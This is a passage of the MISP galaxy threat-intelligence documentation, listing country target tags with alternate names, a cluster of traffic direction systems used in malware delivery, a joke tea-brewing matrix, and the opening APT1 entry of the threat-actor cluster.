The tag is: misp-galaxy:target-information="Italy"

Italy is also known as:

  • Italia

  • Italian Republic

  • Repubblica Italiana

Ivory Coast

The tag is: misp-galaxy:target-information="Ivory Coast"

Ivory Coast is also known as:

  • Côte d’Ivoire

  • Republic of Côte d’Ivoire

  • République de Côte d’Ivoire

Jamaica

The tag is: misp-galaxy:target-information="Jamaica"

Japan

The tag is: misp-galaxy:target-information="Japan"

Japan is also known as:

  • 日本

  • Nippon

  • Nihon

  • Nippon-koku

  • Nihon-koku

  • State of Japan

Jersey

The tag is: misp-galaxy:target-information="Jersey"

Jersey is also known as:

  • Jèrri

  • Bailiwick of Jersey

  • Bailliage de Jersey

  • Bailliage dé Jèrri

Jordan

The tag is: misp-galaxy:target-information="Jordan"

Jordan is also known as:

  • الْأُرْدُنّ‎

  • Al-ʾUrdunn

  • Hashemite Kingdom of Jordan

  • المملكة الأردنية الهاشمية

  • Al-Mamlakah Al-Urdunnīyah Al-Hāshimīyah

Kazakhstan

The tag is: misp-galaxy:target-information="Kazakhstan"

Kazakhstan is also known as:

  • Қазақстан

  • Qazaqstan

  • Казахстан

  • Republic of Kazakhstan

  • Қазақстан Республикасы

  • Qazaqstan Respýblıkasy

  • Республика Казахстан

  • Respublika Kazakhstan

Kenya

The tag is: misp-galaxy:target-information="Kenya"

Kenya is also known as:

  • Republic of Kenya

  • Jamhuri ya Kenya

Kiribati

The tag is: misp-galaxy:target-information="Kiribati"

Kiribati is also known as:

  • Republic of Kiribati

  • Ribaberiki Kiribati

Kosovo

The tag is: misp-galaxy:target-information="Kosovo"

Kosovo is also known as:

  • Kosova

  • Kosovë

  • Косово

  • Republic of Kosovo

  • Republika e Kosovës

  • Република Косово

  • Republika Kosovo

Kuwait

The tag is: misp-galaxy:target-information="Kuwait"

Kuwait is also known as:

  • الكويت‎

  • al-Kuwait

  • State of Kuwait

  • دولة الكويت

  • Dawlat al-Kuwait

Kyrgyzstan

The tag is: misp-galaxy:target-information="Kyrgyzstan"

Kyrgyzstan is also known as:

  • Кыргызстан

  • Kırğızstan

  • Kyrgyz

  • Kyrgyz Republic

  • Кыргыз Республикасы

  • Kırğız Respublikası

  • Кыргызская Республика

  • Kyrgyzskaya Respublika

  • Kirghizia

  • Киргизия

Laos

The tag is: misp-galaxy:target-information="Laos"

Laos is also known as:

  • Lāo

  • ລາວ

  • Lao People’s Democratic Republic

  • ສາທາລະນະລັດ ປະຊາທິປະໄຕ ປະຊາຊົນລາວ

  • Sathalanalat Paxathipatai Paxaxon Lao

  • République démocratique populaire lao

  • Muang Lao

  • ເມືອງລາວ

Latvia

The tag is: misp-galaxy:target-information="Latvia"

Latvia is also known as:

  • Latvija

  • Lețmō

  • Republic of Latvia

  • Latvijas Republika

  • Lețmō Vabāmō

Lebanon

The tag is: misp-galaxy:target-information="Lebanon"

Lebanon is also known as:

  • لبنان

  • Lubnān

  • Liban

  • Lebanese Republic

  • الجمهورية اللبنانية

  • al-Jumhūrīyah al-Lubnānīyah

  • République libanaise

Lesotho

The tag is: misp-galaxy:target-information="Lesotho"

Lesotho is also known as:

  • Kingdom of Lesotho

  • 'Muso oa Lesotho

Liberia

The tag is: misp-galaxy:target-information="Liberia"

Liberia is also known as:

  • Republic of Liberia

Libya

The tag is: misp-galaxy:target-information="Libya"

Libya is also known as:

  • ليبيا‎

  • Lībiyā

  • State of Libya

  • دولة ليبيا

Liechtenstein

The tag is: misp-galaxy:target-information="Liechtenstein"

Liechtenstein is also known as:

  • Principality of Liechtenstein

  • Fürstentum Liechtenstein

Lithuania

The tag is: misp-galaxy:target-information="Lithuania"

Lithuania is also known as:

  • Lietuva

  • Republic of Lithuania

  • Lietuvos Respublika

Macau

The tag is: misp-galaxy:target-information="Macau"

Macau is also known as:

  • Macao

  • 澳門

  • Macao Special Administrative Region of the People’s Republic of China

  • 中華人民共和國澳門特別行政區

  • Jūng’wàh Yàhnmàhn Guhng’wòhgwok Oumún Dahkbiht Hàhngjingkēui

  • Região Administrativa Especial de Macau da República Popular da China

North Macedonia

The tag is: misp-galaxy:target-information="North Macedonia"

North Macedonia is also known as:

  • Republic of North Macedonia

  • Република Северна Македонија

  • Republika e Maqedonisë së Veriut

Madagascar

The tag is: misp-galaxy:target-information="Madagascar"

Madagascar is also known as:

  • Madagasikara

  • Republic of Madagascar

  • Repoblikan’i Madagasikara

  • République de Madagascar

  • Malagasy Republic

Malawi

The tag is: misp-galaxy:target-information="Malawi"

Malawi is also known as:

  • Republic of Malawi

  • Dziko la Malaŵi

  • Charu cha Malaŵi

Malaysia

The tag is: misp-galaxy:target-information="Malaysia"

Maldives

The tag is: misp-galaxy:target-information="Maldives"

Maldives is also known as:

  • ދިވެހިރާއްޖެ

  • Dhivehi Raajje

  • Republic of Maldives

  • ދިވެހިރާއްޖޭގެ ޖުމްހޫރިއްޔާ

  • Dhivehi Raajjeyge Jumhooriyyaa

Mali

The tag is: misp-galaxy:target-information="Mali"

Mali is also known as:

  • Republic of Mali

  • Renndaandi Maali

  • République du Mali

  • Mali ka Fasojamana

Malta

The tag is: misp-galaxy:target-information="Malta"

Malta is also known as:

  • Republic of Malta

  • Repubblika ta' Malta

Marshall Islands

The tag is: misp-galaxy:target-information="Marshall Islands"

Marshall Islands is also known as:

  • Republic of the Marshall Islands

  • Aolepān Aorōkin M̧ajeļ

Mauritania

The tag is: misp-galaxy:target-information="Mauritania"

Mauritania is also known as:

  • موريتانيا‎

  • Mūrītānyā

  • Mauritanie

  • Islamic Republic of Mauritania

  • الجمهورية الإسلامية الموريتانية

  • al-Jumhūrīyah al-Islāmīyah al-Mūrītānīyah

  • République islamique de Mauritanie

Mauritius

The tag is: misp-galaxy:target-information="Mauritius"

Mauritius is also known as:

  • Maurice

  • Moris

  • Republic of Mauritius

  • République de Maurice

  • Repiblik Moris

Mayotte

The tag is: misp-galaxy:target-information="Mayotte"

Mayotte is also known as:

  • Maore

  • Mahori

  • Department of Mayotte

  • Département de Mayotte

Mexico

The tag is: misp-galaxy:target-information="Mexico"

Mexico is also known as:

  • México

  • Mēxihco

  • United Mexican States

  • Estados Unidos Mexicanos

Micronesia

The tag is: misp-galaxy:target-information="Micronesia"

Micronesia is also known as:

  • FSM

  • Federated States of Micronesia

Moldova

The tag is: misp-galaxy:target-information="Moldova"

Moldova is also known as:

  • Republic of Moldova

  • Republica Moldova

Monaco

The tag is: misp-galaxy:target-information="Monaco"

Monaco is also known as:

  • Principality of Monaco

  • Principauté de Monaco

  • Principatu de Mùnegu

Mongolia

The tag is: misp-galaxy:target-information="Mongolia"

Mongolia is also known as:

  • Монгол Улс

  • Mongol Uls

Montenegro

The tag is: misp-galaxy:target-information="Montenegro"

Montenegro is also known as:

  • Црна Гора

  • Crna Gora

Montserrat

The tag is: misp-galaxy:target-information="Montserrat"

Morocco

The tag is: misp-galaxy:target-information="Morocco"

Morocco is also known as:

  • المغرب‎

  • al-maġhrib

  • ⵍⵎⵖⵔⵉⴱ

  • lmeɣrib

  • Maroc

  • Kingdom of Morocco

  • المملكة المغربية

  • al-mamlakah al-maghribiyah

  • ⵜⴰⴳⵍⴷⵉⵜ ⵏ ⵍⵎⵖⵔⵉⴱ

  • tageldit n lmaɣrib

  • Royaume du Maroc

Mozambique

The tag is: misp-galaxy:target-information="Mozambique"

Mozambique is also known as:

  • Republic of Mozambique

  • Moçambique

  • Mozambiki

  • Msumbiji

  • Muzambhiki

  • República de Moçambique

  • Dziko la Mozambiki

  • Jamhuri ya Msumbiji

Myanmar

The tag is: misp-galaxy:target-information="Myanmar"

Myanmar is also known as:

  • မြန်မာ

  • Burma

  • Republic of the Union of Myanmar

  • ပြည်ထောင်စု သမ္မတ မြန်မာနိုင်ငံတော်‌

  • Pyidaunzu Thanmăda Myăma Nainngandaw

Namibia

The tag is: misp-galaxy:target-information="Namibia"

Namibia is also known as:

  • Republic of Namibia

  • Republiek van Namibië

  • Republik Namibia

  • Namibiab Republiki dib

  • Republika yaNamibia

  • Orepublika yaNamibia

  • Republika zaNamibia

  • Rephaboliki ya Namibia

  • Namibia ye Lukuluhile

Nauru

The tag is: misp-galaxy:target-information="Nauru"

Nauru is also known as:

  • Naoero

  • Republic of Nauru

  • Repubrikin Naoero

  • Pleasant Island

Nepal

The tag is: misp-galaxy:target-information="Nepal"

Nepal is also known as:

  • नेपाल

  • Federal Democratic Republic of Nepal

  • सङ्घीय लोकतान्त्रिक गणतन्त्र नेपाल

  • Saṅghīya Lokatāntrik Gaṇatantra Nepāl

Netherlands

The tag is: misp-galaxy:target-information="Netherlands"

Netherlands is also known as:

  • Nederland

  • Holland

Netherlands Antilles

The tag is: misp-galaxy:target-information="Netherlands Antilles"

Netherlands Antilles is also known as:

  • Nederlandse Antillen

  • Antia Hulandes

New Caledonia

The tag is: misp-galaxy:target-information="New Caledonia"

New Caledonia is also known as:

  • Nouvelle-Calédonie

New Zealand

The tag is: misp-galaxy:target-information="New Zealand"

New Zealand is also known as:

  • Aotearoa

Nicaragua

The tag is: misp-galaxy:target-information="Nicaragua"

Nicaragua is also known as:

  • Republic of Nicaragua

  • República de Nicaragua

Niger

The tag is: misp-galaxy:target-information="Niger"

Niger is also known as:

  • The Niger

  • Republic of the Niger

  • République du Niger

Nigeria

The tag is: misp-galaxy:target-information="Nigeria"

Nigeria is also known as:

  • Federal Republic of Nigeria

  • Jamhuriyar Taraiyar Nijeriya

  • Ọ̀hàńjíkọ̀ Ọ̀hànézè Naìjíríyà

  • Orílẹ̀-èdè Olómìniira Àpapọ̀ Nàìjíríà

Niue

The tag is: misp-galaxy:target-information="Niue"

Niue is also known as:

  • Niuē

North Korea

The tag is: misp-galaxy:target-information="North Korea"

North Korea is also known as:

  • 조선

  • Chosŏn

  • 북조선

  • Pukchosŏn

  • Democratic People’s Republic of Korea

  • DPRK

  • DPR Korea

  • 조선민주주의인민공화국

  • Chosŏn Minjujuŭi Inmin Konghwaguk

Northern Mariana Islands

The tag is: misp-galaxy:target-information="Northern Mariana Islands"

Northern Mariana Islands is also known as:

  • Commonwealth of the Northern Mariana Islands

  • Sankattan Siha Na Islas Mariånas

  • Commonwealth Téél Falúw kka Efáng llól Marianas

Norway

The tag is: misp-galaxy:target-information="Norway"

Norway is also known as:

  • Norge

  • Noreg

  • Norga

  • Nöörje

  • Vuodna

  • Kingdom of Norway

  • Kongeriket Norge

  • Kongeriket Noreg

  • Norgga gonagasriika

  • Nøørjen gånkarijhke

  • Vuona gånågisrijkka

Oman

The tag is: misp-galaxy:target-information="Oman"

Oman is also known as:

  • عمان‎

  • ʻumān

  • Sultanate of Oman

  • سلطنة عُمان

  • Salṭanat ʻUmān

Pakistan

The tag is: misp-galaxy:target-information="Pakistan"

Pakistan is also known as:

  • Islamic Republic of Pakistan

  • اِسلامی جمہوریہ پاكِستان

  • Islāmī Jumhūriyah Pākistān

Palau

The tag is: misp-galaxy:target-information="Palau"

Palau is also known as:

  • Belau

  • Palaos

  • Pelew

  • Republic of Palau

  • Beluu er a Belau

  • パラオ共和国

Palestine

The tag is: misp-galaxy:target-information="Palestine"

Palestine is also known as:

  • فلسطين‎

  • Filasṭīn

  • State of Palestine

  • دولة فلسطين

  • Dawlat Filasṭīn

Panama

The tag is: misp-galaxy:target-information="Panama"

Panama is also known as:

  • Panamá

  • Republic of Panama

  • República de Panamá

Papua New Guinea

The tag is: misp-galaxy:target-information="Papua New Guinea"

Papua New Guinea is also known as:

  • Papua Niugini

  • Papua Niu Gini

  • Independent State of Papua New Guinea

  • Independen Stet bilong Papua Niugini

  • Independen Stet bilong Papua Niu Gini

Paraguay

The tag is: misp-galaxy:target-information="Paraguay"

Paraguay is also known as:

  • Paraguái

  • Republic of Paraguay

  • República del Paraguay

  • Tetã Paraguái

Peru

The tag is: misp-galaxy:target-information="Peru"

Peru is also known as:

  • Perú

  • Piruw Republika

  • Piruw Suyu

  • Republic of Peru

  • República del Perú

Philippines

The tag is: misp-galaxy:target-information="Philippines"

Philippines is also known as:

  • Pilipinas

  • Filipinas

  • Republic of the Philippines

  • Republika ng Pilipinas

Pitcairn

The tag is: misp-galaxy:target-information="Pitcairn"

Pitcairn is also known as:

  • Pitkern Ailen

  • Pitcairn, Henderson, Ducie and Oeno Islands

  • Pitcairn Islands

Poland

The tag is: misp-galaxy:target-information="Poland"

Poland is also known as:

  • Polska

  • Republic of Poland

  • Rzeczpospolita Polska

Portugal

The tag is: misp-galaxy:target-information="Portugal"

Portugal is also known as:

  • Portuguese Republic

  • República Portuguesa

Puerto Rico

The tag is: misp-galaxy:target-information="Puerto Rico"

Puerto Rico is also known as:

  • Porto Rico

Qatar

The tag is: misp-galaxy:target-information="Qatar"

Qatar is also known as:

  • قطر

  • Qaṭar

  • State of Qatar

  • دولة قطر

Republic of the Congo

The tag is: misp-galaxy:target-information="Republic of the Congo"

Republic of the Congo is also known as:

  • République du Congo

  • Repubilika ya Kôngo

  • Republíki ya Kongó

  • Congo-Brazzaville

  • Congo Republic

  • RotC

  • Congo

Reunion

The tag is: misp-galaxy:target-information="Reunion"

Reunion is also known as:

  • La Réunion

  • Île Bourbon

Romania

The tag is: misp-galaxy:target-information="Romania"

Romania is also known as:

  • România

Russia

The tag is: misp-galaxy:target-information="Russia"

Russia is also known as:

  • Росси́я

  • Rossiya

  • Russian Federation

  • Российская Федерация

  • Rossiyskaya Federatsiya

Rwanda

The tag is: misp-galaxy:target-information="Rwanda"

Rwanda is also known as:

  • u Rwanda

  • Republic of Rwanda

  • Repubulika y’u Rwanda

  • République du Rwanda

  • Jamhuri ya Rwanda

Saint Barthelemy

The tag is: misp-galaxy:target-information="Saint Barthelemy"

Saint Barthelemy is also known as:

  • Saint-Barthélemy

  • Territorial Collectivity of Saint-Barthélemy

  • Collectivité territoriale de Saint-Barthélemy

  • Collectivity of Saint-Barthélemy

  • Collectivité de Saint-Barthélemy

Saint Helena

The tag is: misp-galaxy:target-information="Saint Helena"

Saint Helena is also known as:

  • Saint Helena, Ascension and Tristan da Cunha

Saint Kitts and Nevis

The tag is: misp-galaxy:target-information="Saint Kitts and Nevis"

Saint Kitts and Nevis is also known as:

  • Federation of Saint Christopher and Nevis

Saint Lucia

The tag is: misp-galaxy:target-information="Saint Lucia"

Saint Lucia is also known as:

  • Sainte-Lucie

Saint Martin

The tag is: misp-galaxy:target-information="Saint Martin"

Saint Martin is also known as:

  • Saint-Martin

  • Collectivity of Saint Martin

  • Collectivité de Saint-Martin

Saint Pierre and Miquelon

The tag is: misp-galaxy:target-information="Saint Pierre and Miquelon"

Saint Pierre and Miquelon is also known as:

  • Saint-Pierre-et-Miquelon

  • Overseas Collectivity of Saint Pierre and Miquelon

  • Collectivité d’outre-mer de Saint-Pierre-et-Miquelon

Saint Vincent and the Grenadines

The tag is: misp-galaxy:target-information="Saint Vincent and the Grenadines"

Samoa

The tag is: misp-galaxy:target-information="Samoa"

Samoa is also known as:

  • Independent State of Samoa

  • Malo Saʻoloto Tutoʻatasi o Sāmoa

  • Western Samoa

San Marino

The tag is: misp-galaxy:target-information="San Marino"

San Marino is also known as:

  • Republic of San Marino

  • Repubblica di San Marino

  • Most Serene Republic of San Marino

  • Serenissima Repubblica di San Marino

Sao Tome and Principe

The tag is: misp-galaxy:target-information="Sao Tome and Principe"

Sao Tome and Principe is also known as:

  • Democratic Republic of São Tomé and Príncipe

  • República Democrática de São Tomé e Príncipe

Saudi Arabia

The tag is: misp-galaxy:target-information="Saudi Arabia"

Saudi Arabia is also known as:

  • Kingdom of Saudi Arabia

  • المملكة العربية السعودية

  • al-Mamlakah al-ʿArabīyah as-Saʿūdīyah

Senegal

The tag is: misp-galaxy:target-information="Senegal"

Senegal is also known as:

  • Sénégal

  • Republic of Senegal

  • Réewum Senegaal

  • Renndaandi Senegal

  • République du Sénégal

Serbia

The tag is: misp-galaxy:target-information="Serbia"

Serbia is also known as:

  • Србија

  • Srbija

  • Republic of Serbia

  • Република Србија

  • Republika Srbija

Seychelles

The tag is: misp-galaxy:target-information="Seychelles"

Seychelles is also known as:

  • Republic of Seychelles

  • République des Seychelles

  • Repiblik Sesel

Sierra Leone

The tag is: misp-galaxy:target-information="Sierra Leone"

Sierra Leone is also known as:

  • Republic of Sierra Leone

  • Salone

Singapore

The tag is: misp-galaxy:target-information="Singapore"

Singapore is also known as:

  • Republic of Singapore

Sint Maarten

The tag is: misp-galaxy:target-information="Sint Maarten"

Slovakia

The tag is: misp-galaxy:target-information="Slovakia"

Slovakia is also known as:

  • Slovensko

  • Slovak Republic

  • Slovenská republika

Slovenia

The tag is: misp-galaxy:target-information="Slovenia"

Slovenia is also known as:

  • Slovenija

  • Republic of Slovenia

  • Republika Slovenija

Solomon Islands

The tag is: misp-galaxy:target-information="Solomon Islands"

Somalia

The tag is: misp-galaxy:target-information="Somalia"

Somalia is also known as:

  • Soomaaliya

  • الصومال‎

  • aṣ-Ṣūmāl

  • Federal Republic of Somalia

  • Jamhuuriyadda Federaalka Soomaaliya

  • جمهورية الصومال الاتحادية

  • Jumhūrīyat aṣ-Ṣūmāl al-Fīdirālīyah

South Africa

The tag is: misp-galaxy:target-information="South Africa"

South Africa is also known as:

  • Republic of South Africa

  • RSA

  • iRiphabhuliki yaseNingizimu Afrika

  • iRiphabliki yomZantsi Afrika

  • Republiek van Suid-Afrika

  • Repabliki ya Afrika-Borwa

  • Rephaboliki ya Aforika Borwa

  • Rephaboliki ya Afrika Borwa

  • Riphabliki ya Afrika Dzonga

  • iRiphabhulikhi yeNingizimu Afrika

  • Riphabuḽiki ya Afurika Tshipembe

  • iRipha bliki yeSewula Afrika

South Korea

The tag is: misp-galaxy:target-information="South Korea"

South Korea is also known as:

  • Republic of Korea

  • 대한민국

  • Daehan Minguk

South Sudan

The tag is: misp-galaxy:target-information="South Sudan"

South Sudan is also known as:

  • Republic of South Sudan

Spain

The tag is: misp-galaxy:target-information="Spain"

Spain is also known as:

  • Kingdom of Spain

  • Reino de España

  • Regne d’Espanya

  • Espainiako Erresuma

  • Reiaume d’Espanha

Sri Lanka

The tag is: misp-galaxy:target-information="Sri Lanka"

Sri Lanka is also known as:

  • ශ්‍රී ලංකා

  • Śrī Laṃkā

  • இலங்கை

  • Ilaṅkai

  • Democratic Socialist Republic of Sri Lanka

  • ශ්‍රී ලංකා ප්‍රජාතාන්ත්‍රික සමාජවාදී ජනරජය

  • Srī Lankā prajātāntrika samājavādī janarajaya

  • இலங்கை ஜனநாயக சோசலிச குடியரசு

  • Ilaṅkai jaṉanāyaka sōsalisa kuṭiyarasu

Sudan

The tag is: misp-galaxy:target-information="Sudan"

Sudan is also known as:

  • السودان‎

  • as-Sūdān

  • Republic of the Sudan

  • جمهورية السودان

  • Jumhūriyyat as-Sūdān

Suriname

The tag is: misp-galaxy:target-information="Suriname"

Suriname is also known as:

  • Surinam

  • Republic of Suriname

  • Republiek Suriname

Svalbard and Jan Mayen

The tag is: misp-galaxy:target-information="Svalbard and Jan Mayen"

Svalbard and Jan Mayen is also known as:

  • Svalbard og Jan Mayen

Swaziland

The tag is: misp-galaxy:target-information="Swaziland"

Swaziland is also known as:

  • Eswatini

  • eSwatini

  • Kingdom of eSwatini

  • Umbuso weSwatini

Sweden

The tag is: misp-galaxy:target-information="Sweden"

Sweden is also known as:

  • Sverige

  • Kingdom of Sweden

  • Konungariket Sverige

Switzerland

The tag is: misp-galaxy:target-information="Switzerland"

Switzerland is also known as:

  • Swiss Confederation

  • Schweizerische Eidgenossenschaft

  • Confédération suisse

  • Confederazione Svizzera

  • Confederaziun svizra

  • Confoederatio Helvetica

Syria

The tag is: misp-galaxy:target-information="Syria"

Syria is also known as:

  • سوريا‎

  • Sūriyā

  • Syrian Arab Republic

  • الجمهورية العربية السورية

  • al-Jumhūrīyah al-ʻArabīyah as-Sūrīyah

Taiwan

The tag is: misp-galaxy:target-information="Taiwan"

Taiwan is also known as:

  • Republic of China

  • ROC

  • 中華民國

Tajikistan

The tag is: misp-galaxy:target-information="Tajikistan"

Tajikistan is also known as:

  • Тоҷикистон

  • Republic of Tajikistan

  • Ҷумҳурии Тоҷикистон

  • Jumhurii Tojikiston

Tanzania

The tag is: misp-galaxy:target-information="Tanzania"

Tanzania is also known as:

  • United Republic of Tanzania

  • Jamhuri ya Muungano wa Tanzania

Thailand

The tag is: misp-galaxy:target-information="Thailand"

Thailand is also known as:

  • Siam

  • Kingdom of Thailand

  • ราชอาณาจักรไทย

  • Ratcha-anachak Thai

Togo

The tag is: misp-galaxy:target-information="Togo"

Togo is also known as:

  • Togolese Republic

  • République togolaise

Tokelau

The tag is: misp-galaxy:target-information="Tokelau"

Tokelau is also known as:

  • Union Islands

  • Tokelau Islands

Tonga

The tag is: misp-galaxy:target-information="Tonga"

Tonga is also known as:

  • Kingdom of Tonga

  • Puleʻanga Fakatuʻi ʻo Tonga

Trinidad and Tobago

The tag is: misp-galaxy:target-information="Trinidad and Tobago"

Trinidad and Tobago is also known as:

  • Republic of Trinidad and Tobago

Tunisia

The tag is: misp-galaxy:target-information="Tunisia"

Tunisia is also known as:

  • تونس

  • Republic of Tunisia

  • الجمهورية التونسية

  • al-Jumhūrīyah at-Tūnisīyah

  • République tunisienne

Turkey

The tag is: misp-galaxy:target-information="Turkey"

Turkey is also known as:

  • Türkiye

  • Republic of Turkey

  • Türkiye Cumhuriyeti

Turkmenistan

The tag is: misp-galaxy:target-information="Turkmenistan"

Turkmenistan is also known as:

  • Türkmenistan

Turks and Caicos Islands

The tag is: misp-galaxy:target-information="Turks and Caicos Islands"

Turks and Caicos Islands is also known as:

  • TCI

Tuvalu

The tag is: misp-galaxy:target-information="Tuvalu"

Tuvalu is also known as:

  • Ellice Islands

U.S. Virgin Islands

The tag is: misp-galaxy:target-information="U.S. Virgin Islands"

U.S. Virgin Islands is also known as:

  • United States Virgin Islands

  • USVI

  • American Virgin Islands

  • Virgin Islands of the United States

Uganda

The tag is: misp-galaxy:target-information="Uganda"

Uganda is also known as:

  • Republic of Uganda

  • Jamhuri ya Uganda

Ukraine

The tag is: misp-galaxy:target-information="Ukraine"

Ukraine is also known as:

  • Україна

  • Ukrayina

United Arab Emirates

The tag is: misp-galaxy:target-information="United Arab Emirates"

United Arab Emirates is also known as:

  • UAE

  • الإمارات العربية المتحدة

  • al-ʾImārāt al-ʿArabīyyah al-Muttaḥidah

  • Emirates

  • الإمارات‎

  • al-ʾImārāt

United Kingdom

The tag is: misp-galaxy:target-information="United Kingdom"

United Kingdom is also known as:

  • United Kingdom of Great Britain and Northern Ireland

  • UK

  • U.K.

  • Britain

United States

The tag is: misp-galaxy:target-information="United States"

United States is also known as:

  • United States of America

  • USA

  • U.S.

  • US

  • America

Uruguay

The tag is: misp-galaxy:target-information="Uruguay"

Uruguay is also known as:

  • Oriental Republic of Uruguay

  • República Oriental del Uruguay

  • República Oriental do Uruguai

Uzbekistan

The tag is: misp-galaxy:target-information="Uzbekistan"

Uzbekistan is also known as:

  • O’zbekiston

  • Ўзбекистон

  • Republic of Uzbekistan

  • O’zbekiston Respublikasi

  • Ўзбекистон Республикаси

Vanuatu

The tag is: misp-galaxy:target-information="Vanuatu"

Vanuatu is also known as:

  • Republic of Vanuatu

  • Ripablik blong Vanuatu

  • République de Vanuatu

Vatican

The tag is: misp-galaxy:target-information="Vatican"

Vatican is also known as:

  • Vatican City

  • Vatican City State

  • Status Civitatis Vaticanae

  • Stato della Città del Vaticano

Venezuela

The tag is: misp-galaxy:target-information="Venezuela"

Venezuela is also known as:

  • Bolivarian Republic of Venezuela

  • República Bolivariana de Venezuela

Vietnam

The tag is: misp-galaxy:target-information="Vietnam"

Vietnam is also known as:

  • Việt Nam

  • Socialist Republic of Vietnam

  • Cộng hòa xã hội chủ nghĩa Việt Nam

Wallis and Futuna

The tag is: misp-galaxy:target-information="Wallis and Futuna"

Wallis and Futuna is also known as:

  • Territory of the Wallis and Futuna Islands

  • Wallis-et-Futuna

  • Territoire des îles Wallis-et-Futuna

  • Uvea mo Futuna

  • Telituale o Uvea mo Futuna

Western Sahara

The tag is: misp-galaxy:target-information="Western Sahara"

Western Sahara is also known as:

  • الصحراء الغربية

  • aṣ-Ṣaḥrā' al-Gharbīyah

  • Taneẓroft Tutrimt

  • Sahara Occidental

Yemen

The tag is: misp-galaxy:target-information="Yemen"

Yemen is also known as:

  • ٱلْيَمَن‎

  • al-Yaman

  • Republic of Yemen

  • ٱلْجُمْهُورِيَّة ٱلْيَمَنِيَّة

  • al-Jumhūrīyah al-Yamanīyah

  • Yemeni Republic

Zambia

The tag is: misp-galaxy:target-information="Zambia"

Zambia is also known as:

  • Republic of Zambia

Zimbabwe

The tag is: misp-galaxy:target-information="Zimbabwe"

Zimbabwe is also known as:

  • Rhodesia

  • Republic of Zimbabwe

  • Nyika yeZimbabwe

  • Ilizwe leZimbabwe

  • Dziko la Zimbabwe

  • Hango yeZimbabwe

  • Zimbabwe Nù

  • Inyika yeZimbabwe

  • Tiko ra Zimbabwe

  • Naha ya Zimbabwe

  • Cisi ca Zimbabwe

  • Shango ḽa Zimbabwe

TDS

TDS is a list of Traffic Direction Systems used by adversaries.

TDS is a cluster galaxy available in JSON format at this location The JSON format can be freely reused in your application or automatically enabled in MISP.
authors

Kafeine

Keitaro

Keitaro TDS is among the most widely used TDS in drive-by infection chains.

The tag is: misp-galaxy:tds="Keitaro"

Table 11761. Table References

Links

https://keitarotds.com/

BlackTDS

BlackTDS is a mutualised (shared) TDS advertised on underground forums since the end of December 2017.

The tag is: misp-galaxy:tds="BlackTDS"

Table 11762. Table References

Links

https://blacktds[.]com/

ShadowTDS

ShadowTDS has been advertised on underground forums since February 2016. It is in fact closer to a social engineering kit focused on Android that embeds a TDS.

The tag is: misp-galaxy:tds="ShadowTDS"

Sutra

Sutra TDS was the dominant TDS from 2012 to 2015.

The tag is: misp-galaxy:tds="Sutra"

Table 11763. Table References

Links

http://kytoon.com/sutra-tds.html

SimpleTDS

SimpleTDS is a basic open source TDS

The tag is: misp-galaxy:tds="SimpleTDS"

SimpleTDS is also known as:

  • Stds

Table 11764. Table References

Links

https://sourceforge.net/projects/simpletds/

zTDS

zTDS is an open source TDS

The tag is: misp-galaxy:tds="zTDS"

Table 11765. Table References

Links

http://ztds.info/doku.php

BossTDS

BossTDS

The tag is: misp-galaxy:tds="BossTDS"

Table 11766. Table References

Links

http://bosstds.com/

BlackHat TDS

BlackHat TDS is sold underground.

The tag is: misp-galaxy:tds="BlackHat TDS"

Table 11767. Table References

Links

http://malware.dontneedcoffee.com/2014/04/meet-blackhat-tds.html

Futuristic TDS

Futuristic TDS is the TDS component of BlackOS/CookieBomb/NorthTale Iframer

The tag is: misp-galaxy:tds="Futuristic TDS"

Orchid TDS

Orchid TDS was sold underground; it was rarely observed in use.

The tag is: misp-galaxy:tds="Orchid TDS"

404 TDS

Proofpoint has tracked the 404 TDS since at least September 2022. Proofpoint is not aware if this is a service sold on underground forums, but it is likely a shared or sold tool due to its involvement in a variety of phishing and malware campaigns.

The tag is: misp-galaxy:tds="404 TDS"

Table 11768. Table References

Links

https://www.proofpoint.com/us/blog/threat-insight/screentime-sometimes-it-feels-like-somebodys-watching-me

Tea Matrix

Tea Matrix.

Tea Matrix is a cluster galaxy available in JSON format at this location The JSON format can be freely reused in your application or automatically enabled in MISP.
authors

Alexandre Dulaunoy

Multi infusion

Multiple infusions are allowed and recommended.

The tag is: misp-galaxy:tea-matrix="Multi infusion"

Single infusion

Single infusion is recommended

The tag is: misp-galaxy:tea-matrix="Single infusion"

Water temp 90-95 degC

Water temperature 90-95 degC

The tag is: misp-galaxy:tea-matrix="Water temp 90-95 degC"

Water temp 80 degC

Water temperature 80 degC

The tag is: misp-galaxy:tea-matrix="Water temp 80 degC"

Brewing time 2-3 min

Brewing time 2-3 minutes

The tag is: misp-galaxy:tea-matrix="Brewing time 2-3 min"

Brewing time 3-4 min

Brewing time 3-4 minutes

The tag is: misp-galaxy:tea-matrix="Brewing time 3-4 min"

Milk in tea

Milk in tea

The tag is: misp-galaxy:tea-matrix="Milk in tea"

Threat Actor

Known or estimated adversary groups targeting organizations and employees. Adversary groups are regularly confused with their initial operation or campaign. The threat-actor-classification meta field can be used to clarify whether a threat actor is also considered an operation, campaign or activity group.

Threat Actor is a cluster galaxy available in JSON format at this location The JSON format can be freely reused in your application or automatically enabled in MISP.
authors

Alexandre Dulaunoy - Florian Roth - Thomas Schreck - Timo Steffens - Various

APT1

PLA Unit 61398 (Chinese: 61398部队, Pinyin: 61398 bùduì) is the Military Unit Cover Designator (MUCD) of a People’s Liberation Army advanced persistent threat unit that has been alleged to be a source of Chinese computer hacking attacks.

The tag is: misp-galaxy:threat-actor="APT1"

APT1 is also known as:

  • COMMENT PANDA

  • PLA Unit 61398

  • Comment Crew

  • Byzantine Candor

  • Group 3

  • TG-8223

  • Comment Group

  • Brown Fox

  • GIF89a

  • ShadyRAT

  • G0006

APT1 has relationships with:

  • similar: misp-galaxy:mitre-intrusion-set="APT1 - G0006" with estimative-language:likelihood-probability="likely"

Table 11769. Table References

Links

https://en.wikipedia.org/wiki/PLA_Unit_61398

http://intelreport.mandiant.com/Mandiant_APT1_Report.pdf

https://www.cfr.org/interactive/cyber-operations/pla-unit-61398

https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf

https://blog.trendmicro.com/trendlabs-security-intelligence/the-siesta-campaign-a-new-targeted-attack-awakens/

https://www.fireeye.com/blog/threat-research/2014/03/a-detailed-examination-of-the-siesta-campaign.html

https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/operation-oceansalt-delivers-wave-after-wave/

https://www.mcafee.com/enterprise/en-us/assets/reports/rp-operation-oceansalt.pdf

